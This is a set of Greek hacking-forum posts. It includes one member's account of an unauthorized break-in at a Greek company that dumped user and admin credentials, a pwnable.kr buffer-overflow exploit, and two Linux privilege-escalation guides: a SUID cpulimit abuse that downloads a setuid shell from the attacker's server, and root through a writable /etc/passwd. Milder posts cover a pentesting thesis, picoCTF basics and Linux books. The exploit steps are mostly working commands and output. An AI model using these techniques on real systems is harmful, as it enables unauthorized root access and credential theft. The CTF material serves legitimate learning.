  15. Φόρουμ, σήμερα για άλλη μια φορά έγινα χαρούμενος μετά από μια «καλή» θεωρώ πράξη, διότι βρήκα κενό ασφαλείας σε μία ελληνική εταιρία, πήρα πρόσβαση σε όλα αλλά επέλεξα να στείλω Email και να αναφέρω ότι υπάρχει το κενό έτσι ώστε να το καλύψουν. Δεν υπάρχει λόγος που βγάζω αυτήν την ανάρτηση απλά θέλω να το μοιραστώ μαζί σας και ελπίζω να σκέφτεστε σωστά την κάθε σας κίνηση. (Θα μπορούσα να μην είχα μπει στην βάση, απλά ήθελα να δω αν θα τα κάνει dump έτσι όπως ήθελα και αυτό και έγινε) Η πρώτη εικόνα είναι emails, real names, usernames και passwords από users Η δεύτερη εικόνα είναι real names, usernames και passwords από τους admin Και η τρίτη εικόνα είναι το Email που αναφέρω το κενό ασφαλείας
  16. Καλησπέρα, μπορεί αυτός ο οδηγός να είναι λίγο πιο "advanced", οπότε θα προσπαθήσω να το αναλύσω όσο πιο πολύ μπορώ. Βρήκα ένα πολύ ενδιαφέρον BOF task στο pwnable.kr το όπιο είναι λιγάκι πιο tricky. Δεν έχει να κάνει με shellcode execution κτλπ είναι ένα απλό buffer με ένα comparison. Επίσης θα κάνουμε μια μικρή εισαγωγή στα pwntools & θα δημιουργήσουμε το δικό μας PoC! Περιεχόμενα : 0x01 Binary Enumeration 0x02 Exploitation + PoC [hide] 0x01 Binary Enumeration Μας δίνει το vulnerable binary, το source code & τον server:port που τρέχει το vulnerable binary. Οπότε το payload μας θα πρέπει να το στείλουμε στο pwnable.kr:9000. Ας κατεβάσουμε τα αρχεία αρχικά. [root@pwn4magic]:~/Desktop/bof# wget -q http://pwnable.kr/bin/bof [root@pwn4magic]:~/Desktop/bof# wget -q http://pwnable.kr/bin/bof.c [root@pwn4magic]:~/Desktop/bof# ls -la total 20 drwxr-xr-x 2 root root 4096 Dec 26 13:15 . drwxr-xr-x 18 root root 4096 Dec 25 19:35 .. -rw-r--r-- 1 root root 7348 May 16 2019 bof -rw-r--r-- 1 root root 308 May 16 2019 bof.c [root@pwn4magic]:~/Desktop/bof# Ας δούμε τώρα τι τύπος αρχείου είναι. [root@pwn4magic]:~/Desktop/bof# file bof bof: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ed643dfe8d026b7238d3033b0d0bcc499504f273, not stripped x86 binary. Ας το τρέξουμε το αρχείο και ας δοκιμάσουμε να στείλουμε μεγάλο input. [root@pwn4magic]:~/Desktop/bof# chmod +x bof [root@pwn4magic]:~/Desktop/bof# ./bof overflow me : n4ckhcker Nah.. [root@pwn4magic]:~/Desktop/bof# python -c 'print "A" * 100' | ./bof overflow me : Nah.. *** stack smashing detected ***: <unknown> terminated Aborted Ωραία να δούμε το source code τώρα. #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; } Έχουμε 2 functions την main() και την func(). Πρέπει να κάνουμε focus στην func(), αρχικά έχουμε ένα buffer 32bytes και μας λέει άμα το key == 0xcafebabe θα μας δώσει shell (/bin/sh). Η gets() είναι η vulnerable function γιατί δεν τσεκάρει το buffer length. Ας το κάνουμε load στο PEDA (Python Exploit Development Assistance - https://github.com/longld/peda). [root@pwn4magic]:~/Desktop/bof# gdb -q bof Reading symbols from bof... (No debugging symbols found in bof) gdb-peda$ info functions All defined functions: Non-debugging symbols: 0x00000474 _init 0x000004c0 gets@plt 0x000004d0 __stack_chk_fail@plt 0x000004e0 __cxa_finalize@plt 0x000004f0 puts@plt 0x00000500 system@plt 0x00000510 __gmon_start__@plt 0x00000520 __libc_start_main@plt 0x00000530 _start 0x00000570 __do_global_dtors_aux 0x000005f0 frame_dummy 0x00000627 __i686.get_pc_thunk.bx 0x0000062c func 0x0000068a main 0x000006b0 __libc_csu_init 0x00000720 __libc_csu_fini 0x00000730 __do_global_ctors_aux 0x00000768 _fini gdb-peda$ Μπορούμε να δούμε τα functions, func() & main(). Ας κάνουμε disassemble το func. gdb-peda$ set disassembly-flavor intel gdb-peda$ disassemble func Dump of assembler code for function func: 0x5655562c <+0>: push ebp 0x5655562d <+1>: mov ebp,esp 0x5655562f <+3>: sub esp,0x48 0x56555632 <+6>: mov eax,gs:0x14 0x56555638 <+12>: mov DWORD PTR [ebp-0xc],eax 0x5655563b <+15>: xor eax,eax 0x5655563d <+17>: mov DWORD PTR [esp],0x78c 0x56555644 <+24>: call 0x56555645 <func+25> 0x56555649 <+29>: lea eax,[ebp-0x2c] 0x5655564c <+32>: mov DWORD PTR [esp],eax 0x5655564f <+35>: call 0x56555650 <func+36> 0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe 0x5655565b <+47>: jne 0x5655566b <func+63> 0x5655565d <+49>: mov DWORD PTR [esp],0x79b 0x56555664 <+56>: call 0x56555665 <func+57> 0x56555669 <+61>: jmp 0x56555677 <func+75> 0x5655566b <+63>: mov DWORD PTR [esp],0x7a3 0x56555672 <+70>: call 0x56555673 <func+71> 0x56555677 <+75>: mov eax,DWORD PTR [ebp-0xc] 0x5655567a <+78>: xor eax,DWORD PTR gs:0x14 0x56555681 <+85>: je 0x56555688 <func+92> 0x56555683 <+87>: call 0x56555684 <func+88> 0x56555688 <+92>: leave 0x56555689 <+93>: ret End of assembler dump. gdb-peda$ Μπορούμε να δούμε το cmp instruction : 0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe Ας βάλουμε ένα breakpoint εδώ & ας δημιουργήσουμε ένα 100bytes pattern. gdb-peda$ break *0x56555654 Breakpoint 1 at 0x56555654 gdb-peda$ pattern create 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r Starting program: /root/Desktop/bof/bof overflow me : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL [----------------------------------registers-----------------------------------] EAX: 0xffffd1bc ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EBX: 0x0 ECX: 0xf7fad5c0 --> 0xfbad2288 EDX: 0xf7faf01c --> 0x0 ESI: 0xf7fad000 --> 0x1d6d6c EDI: 0xf7fad000 --> 0x1d6d6c EBP: 0xffffd1e8 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") ESP: 0xffffd1a0 --> 0xffffd1bc ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EIP: 0x56555654 (<func+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe) EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) Ας κάνουμε display τo memory content του ebp+0x8 στον EIP register. Ο ebp register κάνει track που είναι το stack. gdb-peda$ x/s $ebp+0x8 0xffffd1f0: "AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL" gdb-peda$ pattern offset AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 52 gdb-peda$ 0x02 Exploitation + PoC Έχουμε το offset μπορούμε να φτιάξουμε το PoC μας τώρα. Τα pwntools σου κάνουν την ζωή εύκολη με λίγα λόγια, είναι ένα exploit development library για περισσότερα : https://github.com/Gallopsled/pwntools PoC : #!/usr/bin/env python from pwn import * sock = remote('pwnable.kr', 9000) #kanoyme connection ston vulnerable server payload = "A" * 52 + p32(0xcafebabe) #to payload mas offset 52bytes + se little endian to address sock.sendline(payload) #stelnoyme to payload ston server sock.interactive() #mas dinei shell Ας το τρέξουμε. [root@pwn4magic]:~/Desktop/bof# chmod +x exploit.py [root@pwn4magic]:~/Desktop/bof# ./exploit.py [+] Opening connection to pwnable.kr on port 9000: Done [*] Switching to interactive mode $ whoami bof $ ls bof bof.c flag log log2 super.pl $ cat flag daddy, I just pwned a buFFer :) $ Για ότι απορίες στείλτε μου DM. [/hide]
  17. Καλησπέρα, πρόσφατα βρέθηκα αντιμέτωπος με το cpulimit binary, ήταν SUID set. Καθώς "googlara" δεν βρήκα τίποτα ενδιαφέρον, μόνο αυτό gtfobins. Το όποιο στην περίπτωση μου δεν λειτουργούσε διότι το exploitation είναι για sudo. www-data@somerandomserverlol:/$ cpulimit -l 100 -f /bin/sh cpulimit -l 100 -f /bin/sh Process 1298 detected $ whoami whoami www-data $ Μετά από κάποιους πειραματισμούς βρήκα την λύση να το κάνω bypass. [hide] Αρχικά τι είναι το cpulimit ? Πολύ απλά διαβάζουμε το man page. cpulimit -- limits the CPU usage of a process Θα φτιάξουμε ένα C SUID binary στο μηχάνημα μας & θα το κάνουμε compile. #include <stdio.h> #include <sys/types.h> #include <unistd.h> int main(void) { setuid(0); setgid(0); system("/bin/bash"); } [root@pwn4magic]:~/Desktop# gcc shell.c -w -o shell [root@pwn4magic]:~/Desktop# file shell shell: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=08841c34abb2da5dc45d73412ba24b7bfa572831, for GNU/Linux 3.2.0, not stripped [root@pwn4magic]:~/Desktop# Τώρα πρέπει να το κάνουμε transfer στον target server, εγώ πάντα χρησιμοποιώ τον SimpleHTTPServer της python. [root@pwn4magic]:~/Desktop# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... Ας το κάνουμε wget τώρα με το cpulimit. www-data@somerandomserverlol:/tmp$ cpulimit -l 100 -f wget -q myip/shell Τώρα θα δώσουμε SUID & execute prems στο binary & θα το τρέξουμε. www-data@somerandomserverlol:/tmp$ cpulimit -l 100 -f chmod u+s shell Process 1466 detected Child process is finished, exiting... www-data@somerandomserverlol:/tmp$ cpulimit -l 100 -f chmod +x shell cpulimit -l 100 -f chmod +x shell Process 1468 detected Child process is finished, exiting... Ας το τρέξουμε τώρα. www-data@somerandomserverlol:/tmp$ ./shell ./shell root@somerandomserverlol:/tmp# whoami;id whoami;id root uid=0(root) gid=0(root) groups=0(root),33(www-data) Αυτό ήταν, για ότι απορίες στείλτε μου DM. [/hide]
  18. Καλησπέρα, στον σημερινό οδηγό θα δείξω έναν τρόπο με τον οποίο μπορούμε να κάνουμε privilege escalation μέσο του /etc/passwd. Αρχικά πρέπει να καταλάβουμε τι είναι το /etc/passwd και πως λειτουργεί. Περιεχόμενα : 0x01 Τι είναι το /etc/passwd 0x02 /etc/passwd exploitation [hide] 0x01 Τι είναι το /etc/passwd Με δύο λόγια το /etc/passwd περιέχει τους users του συστήματος, όσοι είστε χρήστες GNU/Linux ανοίξτε ένα terminal και εκτελέστε "cat /etc/passwd" θα δείτε όλους τους default/standard users όπως : root bin daemon mail Άλλα στο τέλος και τον δικό σας user. Ας αναλύσουμε τώρα το /etc/passwd. user:x:0:0:test user:/home/user:/bin/bash 1 2 3 4 5 6 7 Ας το πάρουμε κομμάτι - κομμάτι και είμαι σίγουρος πως θα καταλάβετε πως να το "exploitarete". 1 : Username του user σας, π.χ "kostas" 2 : Password κανονικά οι encrypted passwords αποθηκεύονται στο /etc/shadow. 3 : UID π.χ 0 = root 4 : GID π.χ 0 = root 5 : Comment μπορούμε να το αφήσουμε και κενό 6 : Το /home path π.χ /home/kostas 7 : Το Shell π.χ /bin/bash ή /bin/sh (υπάρχουν και άλλα shells) Πάμε τώρα να το κάνουμε exploit. 0x02 /etc/passwd exploitation Το παράδειγμα το κάνω πάνω στο δικό μου σύστημα, δεν είχα εύκαιρο vulnerable server. Βλέπουμε ότι το /etc/passwd είναι writeable, όσοι δεν καταλαβαίνετε θα φτιάξω tutorial για το chmod αργότερα. Πρώτο βήμα πρέπει να κάνουμε generate ένα password, υπάρχουν πολύ τρόποι θα δείξω μερικούς. greekhacking@pwn4magic:~$ openssl passwd -6 -salt test securepassword $6$test$ooOacljr37T7vvA01c6AFew25DBA9As5rODXNxPA781tHjcnD6OGQ2oegiC7PVzBytTRbSu2zzcphR1EkUFA0. greekhacking@pwn4magic:~$ python3 -c 'import crypt; print(crypt.crypt("securepassword"))' $6$mks4TDK1faVYw9QX$mMtvufWGhuLPcnX6wHNbePmob3u9.w65ls8D3ooU9DOeLCRiusfX6JDP8xokfrNVrespKz.AVW54DrvWuE4RA. Τώρα ας φτιάξουμε έναν fake user. Όπως δείξαμε παραπάνω. hacker:$6$test$ooOacljr37T7vvA01c6AFew25DBA9As5rODXNxPA781tHjcnD6OGQ2oegiC7PVzBytTRbSu2zzcphR1EkUFA0.:0:0:comment:/root:/bin/bash Ας το βάλουμε μέσα στο /etc/passwd και ας αλλάξουμε user με το "su". Είμαστε root. Για ότι απορίες στείλτε μου DM. [/hide]
  19. Tο διαδίκτυο αποτελεί σήμερα απαραίτητο συστατικό της καθημερινής ζωής για τους περισσότερους ανθρώπους. H αξιοποίηση των υπηρεσιών του διαδικτύου για την υποστήριξη των οικονομικών και κοινωνικών δραστηριοτήτων γίνεται κυρίως μέσω των διαδικτυακών εφαρμογών, οι οποίες εξελίσσονται ραγδαία. Όμως, όσο εξαπλώνεται η χρήση των διαδικτυακών εφαρμογών, τόσο περισσότερο γίνονται στόχος επιθέσεων από κακόβουλους χρήστες, οι οποίο προσπαθούν να εκμεταλλευτούν τις αδυναμίες στον κώδικα και τις ρυθμίσεις για την επιτέλεση των σκοπών τους. Επομένως, η ασφάλεια των διαδικτυακών εφαρμογών αποτελεί μια κρίσιμη παράμετρο για την αποδοχή και αξιοποίησή τους. Μια διαδεδομένη πρακτική για την ενίσχυση της ασφάλειας των διαδικτυακών εφαρμογών είναι η πραγματοποίηση δοκιμών διείσδυσης από ειδικούς της ασφάλειας, με τη συγκατάθεση των ιδιοκτητών τους. Οι δοκιμές αποσκοπούν στο να εντοπισθούν τυχόν ευπάθειες και να διαπιστωθεί η ανάγκη λήψης μέτρων προστασίας. Για το σκοπό αυτό, έχουν αναπτυχθεί πολλά και διάφορα εργαλεία για δοκιμές διείσδυσης, τα οποία δεν παρέχουν την ίδια αποτελεσματικότητα και πληρότητα κάλυψης των αναγκών ελέγχου ασφάλειας των εφαρμογών ιστού. Αντικείμενο της παρούσας διπλωματικής εργασίας αποτελεί η έρευνα, η καταγραφή, η ταξινόμηση και η αξιολόγηση των αντιπροσωπευτικών εργαλείων διείσδυσης, κυρίως στη βάση της εφαρμογής τους στο πλαίσιο μιας μεθοδολογίας επίθεσης. Στο πλαίσιο μιας τυποποιημένης διαδικασίας δοκιμών διείσδυσης, σύμφωνα με τη συγκεκριμένη μεθοδολογία επίθεσης, γίνεται προσδιορισμός των ποιοτικών κριτηρίων αξιολόγησης εργαλείων διείσδυσης σε κάθε στάδιο της μεθοδολογίας. Από την οργανωμένη εφαρμογή των εργαλείων δοκιμών διείσδυσης με μια ολοκληρωμένη δοκιμή διείσδυσης σε πραγματικό στόχο, προκύπτουν συμπεράσματα τα οποία αποτυπώνονται σε μια συνολική συγκριτική αξιολόγησή τους. Αξιολόγηση εργαλείων Penetration Testing για Web εφαρμογές - Iatropoulos Ioannis Msc2017.pdf Πηγή: ΨΗΦΙΔΑ - Ψηφιακή Βιβλιοθήκη και Ιδρυματικό Αποθετήριο του Πανεπιστημίου Μακεδονίας
  20. Καλησπέρα, ένα άλλο πολύ ενδιαφέρον CTF είναι το Pico. Το PicoCTF είναι beginner-friendly ξεκινάει με πολύ βασικά tasks & και φτάνει σε advanced tasks. Υπάρχουν οι παρακάτω κατηγορίες : Forensics General Skills Reversing Cryptography Web Exploitation Binary Exploitation Υπάρχει του 2018 που είναι ακόμα live και του 2019. Εμείς θα αρχίσουμε με του 2018, αρχικά με την κατηγορία General Skills, βασικός προγραμματισμός / linux cmds κτλπ. Τα challenges που θα λύσουμε : General Warmup 1 General Warmup 2 General Warmup 3 Resources grep 1 net cat Θα σας έχω links στο τέλος για παραπάνω πληροφορίες. General Warmup 1 [hide] Έχουμε να κάνουμε convert hex -> ASCII , προσωπικά μου αρέσει να χρησιμοποιώ την python. >>> print "41".decode("hex") A Με το flag format : picoCTF{A} General Warmup 2 Οπότε έχουμε να κάνουμε convert base 10 -> base 2. >>> bin(27) '0b11011' Χωρίς το 0b : picoCTF{11011} General Warmup 3 Τώρα πάμε σε base 16 -> base 10 >>> int("0x3D",16) 61 Flag : picoCTF{61} Resources Πολύ απλό challenge, απλά πάμε στο link https://picoctf.com/resources και διαβάζουμε το flag ή με το curl. curl https://picoctf.com/resources | grep "picoCTF{" <li><code class="highlighter-rouge">picoCTF{r3source_pag3_f1ag}</code> (2019 competition)</li> <li><code class="highlighter-rouge">picoCTF{xiexie_ni_lai_zheli}</code> (2018 competition)</li> Flag : picoCTF{xiexie_ni_lai_zheli} grep 1 Αρχικά θα κατεβάσουμε το αρχείο & έπειτα θα χρησιμοποιήσουμε το grep για να βρούμε το flag. wget --no-check-certificate -q https://2018shell.picoctf.com/static/f2e1fdcd5c405ca4170af1a8973b365b/file cat file | grep picoCTF picoCTF{grep_and_you_will_find_d66382d8} Flag : picoCTF{grep_and_you_will_find_d66382d8} net cat Πολύ απλά πρέπει να συνδεθούμε στο 2018shell.picoctf.com & 22847. nc 2018shell.picoctf.com 22847 That wasn't so hard was it? picoCTF{NEtcat_iS_a_NEcESSiTy_69222dcc} Flag : picoCTF{NEtcat_iS_a_NEcESSiTy_69222dcc} Είναι πολλά, θα τα πάρουμε κομμάτι - κομμάτι. Αυτά για τώρα τα λέμε στον επόμενο οδηγό. Links grep : https://www.cyberciti.biz/faq/howto-use-grep-command-in-linux-unix/ netcat : https://netsec.ws/?p=292 [/hide]
  21. The Most Useful Tutorial and Reference, with Hundreds of High-Quality Examples for Every Popular Linux Distribution “First Sobell taught people how to use Linux . . . now he teaches you the power of Linux. A must-have book for anyone who wants to take Linux to the next level.” –Jon “maddog” Hall, Executive Director, Linux International Discover the Power of Linux–Covers macOS, too! Learn from hundreds of realistic, high-quality examples, and become a true command-line guru! NEW! Covers MariaDB, DNF, and Python 3 Covers the macOS command line and its unique tools More than 300 page—long reference covers more than 100 utilities, including macOS commands! For use with all popular versions of Linux, including Ubuntu™, Fedora™, openSUSE™, Red Hat®, Debian, Mageia, Mint, Arch, CentOS, and macOS, too! Linux is today’s dominant Internet server platform. System administrators and Web developers need deep Linux fluency, including expert knowledge of shells and the command line. This is the only guide with everything you need to achieve that level of Linux mastery. Renowned Linux expert Mark Sobell has brought together comprehensive, insightful guidance on the tools sysadmins, developers, and power users need most, and has created an outstanding day-to-day reference, updated with assistance from new coauthor Matthew Helmke. This title is 100 percent distribution and release agnostic. Packed with hundreds of high-quality, realistic examples, it presents Linux from the ground up: the clearest explanations and most useful information about everything from filesystems to shells, editors to utilities, and programming tools to regular expressions. Use a Mac? You’ll find coverage of the macOS command line, including macOS-only tools and utilities that other Linux/UNIX titles ignore. A Practical Guide to Linux® Commands, Editors, and Shell Programming, Fourth Edition, is the only guide to deliver A MariaDB chapter to get you started with this ubiquitous relational database management system (RDBMS) A masterful introduction to Python for system administrators and power users In-depth coverage of the bash and tcsh shells, including a complete discussion of environment, inheritance, and process locality, plus coverage of basic and advanced shell programming Practical explanations of 98 core utilities, from aspell to xargs, including printf and sshfs/curlftpfs, PLUS macOS—specific utilities from ditto to SetFile Expert guidance on automating remote backups using rsync Dozens of system security tips, including step-by-step walkthroughs of implementing secure communications using ssh and scp Tips and tricks for customizing the shell, including step values, sequence expressions, the eval builtin, and implicit command-line continuation High-productivity editing techniques using vim and emacs A comprehensive, 300-plus-page command reference section covering more than 100 utilities, including find, grep, sort, and tar Instructions for updating systems using apt-get and dnf And much more, including coverage of BitTorrent, gawk, sed, find, sort, bzip2, and regular expressions Normal 0 false false false EN-US X-NONE X-NONE. A Practical Guide to Linux Commands, Editors, and Shell Programming 4th Edition.pdf
  22. Ένα βιβλίο σχεδιασμένο για αρχάριου που θέλουν να ασχοληθούν με το λειτουργικό σύστημα ubuntu. Δεν το έχω διαβάσει και δεν μπορώ να υποσχεθώ τίποτα για την αποτελεσματικότητα του [hide] http://filepi.com/i/MxAgWFT [/hide]

ChatBox

ChatBox

Chatroom Rules

  • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
  • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
  • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
  • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
×
×
  • Create New...